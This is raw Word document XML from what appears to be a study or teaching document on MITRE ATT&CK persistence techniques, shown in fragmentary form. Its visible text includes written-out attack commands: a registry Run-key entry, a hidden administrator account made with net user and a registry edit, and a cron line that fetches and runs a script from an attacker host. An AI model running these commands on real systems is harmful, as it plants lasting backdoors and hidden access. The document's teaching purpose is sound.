    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="73E53968" w14:textId="166D698A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</w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4FC41C60" w14:textId="4144FD3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73E2CF20" w14:textId="036321D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reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\victim\AppData\Roaming\update.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1995FE0F" w:rsidP="3E79F1B8" w:rsidRDefault="1995FE0F" w14:paraId="5243BA90" w14:textId="02186ED1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1995FE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next reboot/login, malware auto-executes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="432B4C33" w14:textId="339A4FC3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1B24FE4E" w14:textId="0681FF4B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Attacker maintains access even after the system restarts, avoiding detection by typical antivirus tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="044B1663" w14:textId="30FAB9D9"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="13F99E29" w14:textId="7D84E6ED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️ Technique 2: T1136.001 – Create Account: Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="0B19574D" w14:textId="1C082D9D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c1f7c3f556ef4d43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https://attack.mitre.org/techniques/T1136/001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="79EBC040" w14:textId="63644D1C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="59A4B89F" w14:textId="78F3C109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gains admin access on a host.</w:t>
      </w:r>
      <w:r>
        <w:br/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Creates a hidden user account:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="65FB8788" w14:textId="5D9425CE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</w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5EDD8B4E" w14:textId="76E3BD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1B2F4964" w14:textId="5FF11A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net user hiddenuser Pass1234! /add</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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net localgroup administrators hiddenuser /add</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="20462D6E" w14:textId="5EF2C62F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Hides the user from login screen by registry edit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="1F21287B" w14:textId="3E008919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w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6C78BFB5" w14:textId="15647A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398102A5" w14:textId="357DA9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reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hiddenuser /t REG_DWORD /d 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6125FFE2" w14:textId="17695D74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75F2147A" w14:textId="1185305A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Attacker can return anytime using the hidden admin account, without triggering standard detection alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="145DAFF6" w14:textId="67FCEAC4"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="3C04E524" w14:textId="702C00AC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️ Technique 3: T1053.003 – Scheduled Task: Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6B35B19B" w14:textId="19549AF1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MITRE ATT&amp;CK Reference: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523831b2bef45b0">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD4F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https://attack.mitre.org/techniques/T1053/003</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="3B53B67F" w14:textId="7AB1FFEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="2F091A56" w14:textId="5EB6221B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Attacker compromises a Linux server via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="67F3E382" w14:textId="58C9CAAD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a cron job:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="5564D691" w14:textId="24CC9610">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/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3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="23823BCE" w14:textId="7B0E15E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2DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6768B170" w14:textId="3BAD71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echo "@reboot /usr/bin/curl </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD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http://attacker[.]com/backdoor.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD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 bash" &gt;&gt; /etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="1CD6E14D" w14:textId="6A229F99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next system reboot, the script is downloaded and run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="645873B9" w14:textId="4CA34AB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD4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Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6D0B9E7D" w14:textId="69FEB886">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD4FB3">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacker regains remote access every time the system starts, ensuring long-term control over Linux environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6FF90B41" w14:textId="6B95F32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050f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1e91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db41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e60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ed5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c79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db9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44a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66857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1">
    <w:nsid w:val="2a51a41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6cd79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ab4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4de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065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c4c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487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500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e25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b6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c0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92EB6"/>
    <w:rsid w:val="00698095"/>
    <w:rsid w:val="018857D8"/>
    <w:rsid w:val="01CC477B"/>
    <w:rsid w:val="03AA717E"/>
    <w:rsid w:val="0448E3A7"/>
    <w:rsid w:val="04592EB6"/>
    <w:rsid w:val="06EDF42D"/>
    <w:rsid w:val="07E135D1"/>
    <w:rsid w:val="088DEA10"/>
    <w:rsid w:val="0B21C68C"/>
    <w:rsid w:val="0D8992BA"/>
    <w:rsid w:val="0EE95413"/>
    <w:rsid w:val="11E9747F"/>
    <w:rsid w:val="12B12516"/>
    <w:rsid w:val="142282FF"/>
    <w:rsid w:val="149BB513"/>
    <w:rsid w:val="16276A0C"/>
    <w:rsid w:val="18B3E986"/>
    <w:rsid w:val="1995FE0F"/>
    <w:rsid w:val="1A5EA493"/>
    <w:rsid w:val="1B707646"/>
    <w:rsid w:val="1E64170E"/>
    <w:rsid w:val="1EBACED1"/>
    <w:rsid w:val="1FB53050"/>
    <w:rsid w:val="1FF30ED0"/>
    <w:rsid w:val="21BCD4E4"/>
    <w:rsid w:val="21EFA9C9"/>
    <w:rsid w:val="24123FB9"/>
    <w:rsid w:val="24297379"/>
    <w:rsid w:val="2551B753"/>
    <w:rsid w:val="25746B03"/>
    <w:rsid w:val="262309E6"/>
    <w:rsid w:val="26A8F4BA"/>
    <w:rsid w:val="26D32B91"/>
    <w:rsid w:val="277AAAAC"/>
    <w:rsid w:val="2850AEF0"/>
    <w:rsid w:val="28565AF4"/>
    <w:rsid w:val="2A38A093"/>
    <w:rsid w:val="2AA700B8"/>
    <w:rsid w:val="2ABCB967"/>
    <w:rsid w:val="2AD00E23"/>
    <w:rsid w:val="2B06AD03"/>
    <w:rsid w:val="2C710F14"/>
    <w:rsid w:val="2E7E43D7"/>
    <w:rsid w:val="3019D482"/>
    <w:rsid w:val="30C60E8F"/>
    <w:rsid w:val="314992EC"/>
    <w:rsid w:val="32198316"/>
    <w:rsid w:val="346A4244"/>
    <w:rsid w:val="35709805"/>
    <w:rsid w:val="36A23694"/>
    <w:rsid w:val="36CCC133"/>
    <w:rsid w:val="371BAA50"/>
    <w:rsid w:val="37584D3E"/>
    <w:rsid w:val="38C94F85"/>
    <w:rsid w:val="3B296706"/>
    <w:rsid w:val="3BDF41BD"/>
    <w:rsid w:val="3C00E180"/>
    <w:rsid w:val="3C7B934F"/>
    <w:rsid w:val="3CFA312C"/>
    <w:rsid w:val="3D00432A"/>
    <w:rsid w:val="3E1B1234"/>
    <w:rsid w:val="3E378208"/>
    <w:rsid w:val="3E79F1B8"/>
    <w:rsid w:val="3EDDA9D9"/>
    <w:rsid w:val="3F7F3582"/>
    <w:rsid w:val="4032E90E"/>
    <w:rsid w:val="405E3347"/>
    <w:rsid w:val="41E2EB5A"/>
    <w:rsid w:val="427EA3BC"/>
    <w:rsid w:val="42DD4FB3"/>
    <w:rsid w:val="44803FCD"/>
    <w:rsid w:val="4501516C"/>
    <w:rsid w:val="454BCC0A"/>
    <w:rsid w:val="460ECEF8"/>
    <w:rsid w:val="46672956"/>
    <w:rsid w:val="469A5625"/>
    <w:rsid w:val="4723563E"/>
    <w:rsid w:val="47995D1D"/>
    <w:rsid w:val="4951CA29"/>
    <w:rsid w:val="4A53BD39"/>
    <w:rsid w:val="4ADE4851"/>
    <w:rsid w:val="4B79DE6E"/>
    <w:rsid w:val="4BF20A2B"/>
    <w:rsid w:val="4D87B214"/>
    <w:rsid w:val="4D9A32A0"/>
    <w:rsid w:val="4DA5E20C"/>
    <w:rsid w:val="4EEE61F6"/>
    <w:rsid w:val="4F0478CE"/>
    <w:rsid w:val="4FB90A54"/>
    <w:rsid w:val="51274292"/>
    <w:rsid w:val="529C5C6C"/>
    <w:rsid w:val="53694B8E"/>
    <w:rsid w:val="537E24C8"/>
    <w:rsid w:val="53C21A1D"/>
    <w:rsid w:val="55565A9B"/>
    <w:rsid w:val="56F60842"/>
    <w:rsid w:val="56FBDAE6"/>
    <w:rsid w:val="5799EF49"/>
    <w:rsid w:val="5809A0ED"/>
    <w:rsid w:val="581689BC"/>
    <w:rsid w:val="581D2FDB"/>
    <w:rsid w:val="581FC887"/>
    <w:rsid w:val="58618624"/>
    <w:rsid w:val="58996DB7"/>
    <w:rsid w:val="58FC17B7"/>
    <w:rsid w:val="5941F9C6"/>
    <w:rsid w:val="5985D417"/>
    <w:rsid w:val="5A4E10C0"/>
    <w:rsid w:val="5A61F35A"/>
    <w:rsid w:val="5AFEAAB2"/>
    <w:rsid w:val="5B222EDF"/>
    <w:rsid w:val="5C919C3C"/>
    <w:rsid w:val="5CB3248F"/>
    <w:rsid w:val="5D533534"/>
    <w:rsid w:val="5F511AF1"/>
    <w:rsid w:val="5FCBCD57"/>
    <w:rsid w:val="6021A3A6"/>
    <w:rsid w:val="61A4E880"/>
    <w:rsid w:val="61E5448F"/>
    <w:rsid w:val="64C91782"/>
    <w:rsid w:val="654E4D61"/>
    <w:rsid w:val="66F00BA1"/>
    <w:rsid w:val="686AE05F"/>
    <w:rsid w:val="6924C794"/>
    <w:rsid w:val="6985A135"/>
    <w:rsid w:val="69F21079"/>
    <w:rsid w:val="6A0F2193"/>
    <w:rsid w:val="6A2C1664"/>
    <w:rsid w:val="6AA43266"/>
    <w:rsid w:val="6BF7CEB4"/>
    <w:rsid w:val="6FDEC15F"/>
    <w:rsid w:val="715CC1C9"/>
    <w:rsid w:val="724B76CA"/>
    <w:rsid w:val="732B1A4F"/>
    <w:rsid w:val="75AF78A6"/>
    <w:rsid w:val="773ACFB7"/>
    <w:rsid w:val="7841841E"/>
    <w:rsid w:val="7B89E071"/>
    <w:rsid w:val="7D31B4AB"/>
    <w:rsid w:val="7DFA85FB"/>
    <w:rsid w:val="7EE2EE5A"/>
    <w:rsid w:val="7F59E795"/>
    <w:rsid w:val="7FD6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2EB6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0D202CA-C9A7-49D2-AE01-57B89505E9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E79F1B8"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:uiPriority w:val="34"/>
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="3E79F1B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79F1B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ing.com/ck/a?!&amp;&amp;p=c555c6ccb45a28ef79335ee1c047e3ee4e5614b1bd7d68f0f6c4446ca6a2378fJmltdHM9MTc1MzgzMzYwMA&amp;ptn=3&amp;ver=2&amp;hsh=4&amp;fclid=220029a9-546c-6c17-2a0c-3f90550e6de9&amp;psq=mitre+attack&amp;u=a1aHR0cHM6Ly9hdHRhY2subWl0cmUub3JnLw&amp;ntb=1" TargetMode="External" Id="Re01178d5785d41e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0043" TargetMode="External" Id="R2ff9e1f1509041ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0043" TargetMode="External" Id="Ra188a938da724520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0042" TargetMode="External" Id="R25e5bf2d3ce540da" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0042" TargetMode="External" Id="R1318f63a61dc48f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0001" TargetMode="External" Id="R67ccd4a568294b21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0001" TargetMode="External" Id="R5933952e22f34771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0002" TargetMode="External" Id="R6e44c85637744d37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0002" TargetMode="External" Id="Ra34d81e21d7248f6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0003" TargetMode="External" Id="Rec51ad66267c402b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0003" TargetMode="External" Id="R97a8858d71f84beb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0004" TargetMode="External" Id="R29355dd3675a4c57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0004" TargetMode="External" Id="Rc560e73e92194165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0005" TargetMode="External" Id="R31134b688df347df" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0005" TargetMode="External" Id="Ra3d7a70229d34728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0006" TargetMode="External" Id="R4d66cb383c3e46f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0006" TargetMode="External" Id="R7a239e12abd94c80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0007" TargetMode="External" Id="R7c0a535da2e5441e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0007" TargetMode="External" Id="R7b7e5c8eeb4849ba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0008" TargetMode="External" Id="Rf5a81f69ca784136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0008" TargetMode="External" Id="R66cb5f42ae724c34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0009" TargetMode="External" Id="R2a0a05d769a245b7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0009" TargetMode="External" Id="R5db89ee28c08487d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0011" TargetMode="External" Id="R0716e3dc05a04fe1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0011" TargetMode="External" Id="R40d7861541214342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0010" TargetMode="External" Id="R8575baa134a949f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0010" TargetMode="External" Id="R03c78732cac04ff2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0040" TargetMode="External" Id="Rfe745be3cc674e32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0040" TargetMode="External" Id="Rd38c11898438494d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0027" TargetMode="External" Id="Rca07e6b82dfd49e0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0027" TargetMode="External" Id="R442473e150bf4031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0041" TargetMode="External" Id="Re557f9b7c4ee46c1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0041" TargetMode="External" Id="R81947fe08e0e4a81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0028" TargetMode="External" Id="R58d2f540bfc74f6f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0028" TargetMode="External" Id="Rca5fb6c8f386490c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0029" TargetMode="External" Id="Rb6dd974d7bf04cf2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0029" TargetMode="External" Id="R3bfcf127015d489f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0030" TargetMode="External" Id="Rf3753f9ce03646ac" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0030" TargetMode="External" Id="R7fb47b30b898457a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0031" TargetMode="External" Id="Ree75b040fbf54e73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0031" TargetMode="External" Id="Rf62f30c4360547c2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0032" TargetMode="External" Id="R922e1ea01dbc4285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0032" TargetMode="External" Id="R8b6089bf3fe34877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0033" TargetMode="External" Id="Rd7495d128ba84702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0033" TargetMode="External" Id="R65f7d972c5fc495f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0035" TargetMode="External" Id="R681688f52df8481a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0035" TargetMode="External" Id="R91cea408d36e4cdb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0037" TargetMode="External" Id="Re13cb66218274dca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0037" TargetMode="External" Id="R72023281ecca4297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0036" TargetMode="External" Id="R91f316b293c74347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0036" TargetMode="External" Id="Ra4c525850fa74e6f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0034" TargetMode="External" Id="R57da3d517c224b02" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0034" TargetMode="External" Id="Re7632998a4574a35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0038" TargetMode="External" Id="R77e223ab91354ef3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0038" TargetMode="External" Id="R7ee745a179a3484b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0039" TargetMode="External" Id="Refd2ed7429764aaf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0039" TargetMode="External" Id="R180d138986b6457b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0108" TargetMode="External" Id="R2744ed737f194d96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0108" TargetMode="External" Id="Ra53a32bfeae74ce2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0104" TargetMode="External" Id="R39682b2aee4948de" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0104" TargetMode="External" Id="R856d14e2f0d6470d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0110" TargetMode="External" Id="R5fea61e8106943e3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0110" TargetMode="External" Id="Rc9504356f3b241b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0111" TargetMode="External" Id="R931c53766601448f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0111" TargetMode="External" Id="R64127df75203449d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0103" TargetMode="External" Id="Rb2662ef1123843c7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0103" TargetMode="External" Id="R1178c2393c194f4f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0102" TargetMode="External" Id="R419e1410dd3e468a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0102" TargetMode="External" Id="R032dda74cdf64358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0109" TargetMode="External" Id="Rf287360a7e7845a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0109" TargetMode="External" Id="R94d1329434114cca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0100" TargetMode="External" Id="R0602ad3402e64273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0100" TargetMode="External" Id="Re90651321b2940a1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0101" TargetMode="External" Id="R0033e0ce0dd341e3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0101" TargetMode="External" Id="R446ef86dec4a4f60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0107" TargetMode="External" Id="R94425eeed5324ec3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0107" TargetMode="External" Id="Ref79851e2de44aca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0106" TargetMode="External" Id="Rbe3e4512c3564247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0106" TargetMode="External" Id="Rbfc00219e118429a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0105" TargetMode="External" Id="R8d8d62f528c9417a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0105" TargetMode="External" Id="R78326877797e4635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious-server.com/payload.exe" TargetMode="External" 